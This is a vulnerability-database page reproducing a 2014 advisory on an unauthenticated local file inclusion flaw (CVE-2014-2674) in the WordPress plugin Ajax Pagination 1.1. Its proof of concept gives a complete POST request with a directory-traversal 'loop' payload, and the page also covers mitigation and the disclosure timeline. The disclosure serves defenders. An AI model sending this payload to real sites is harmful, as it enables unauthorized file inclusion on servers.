Lucene search
+L

WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion

🗓️ 31 Mar 2014 00:00:00Reported by Glyn WintleType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
cnvd
CNVD
WordPress Ajax Pagination (twitter Style) plugin path traversal vulnerability
21 Mar 201800:00
cnvd
cve
CVE
CVE-2014-2674
19 Mar 201821:00
cve
cvelist
Cvelist
CVE-2014-2674
19 Mar 201821:00
cvelist
nvd
NVD
CVE-2014-2674
19 Mar 201821:29
nvd
patchstack
Patchstack
WordPress Ajax Pagination Plugin 1.1 - Local File Inclusion
31 Mar 201400:00
patchstack
prion
Prion
Directory traversal
19 Mar 201821:29
prion
wpvulndb
WPVulnDB
Ajax Pagination 1.1 - wp-admin/admin-ajax.php loop Parameter Local File Inclusion
1 Aug 201400:00
wpvulndb
Details
================
Software: Ajax Pagination (twitter Style)
Version: 1.1
Homepage: http://wordpress.org/plugins/ajax-pagination/
CVSS: 9.3 (High; AV:N/AC:M/Au:N/C:C/I:C/A:C)

Description
================
End-user exploitable local file inclusion vulnerability in Ajax
Pagination (twitter Style) 1.1

Vulnerability
================
This plugin contains a file inclusion vulnerability that is exploitable
by an unauthenticated user. The user can include any local file ending
in “.php” which is accessible to the web user.

Proof of concept
================
A non-logged in user can call the ajax function
wp_ajax_nopriv_ajax_navigation that calls ajax_navigation_callback in
ajax-pagination-front.php at line 75.
By setting the value of “loop” in the POST data, they can include the
contents of that path on the returned page.
For example, to include the contents of wp-login.php in the returned
page, send the following:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
paged=2&action=ajax_navigation&loop=../../../wp-login


Mitigations
================
Disable the plugin until a fix is available.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on [email protected] to acknowledge this report if you
received it via a third party (for example, [email protected]) as
they generally cannot communicate with us on your behalf.

Please note that this vulnerability will be published if we do not
receive a response to this report with 14 days.

Timeline
================

2014-02-18: Reported to [email protected] and [email protected]
2014-03-28: No response received to reports. Vulnerability published.


Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2014 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 37.5
EPSS0.15445
29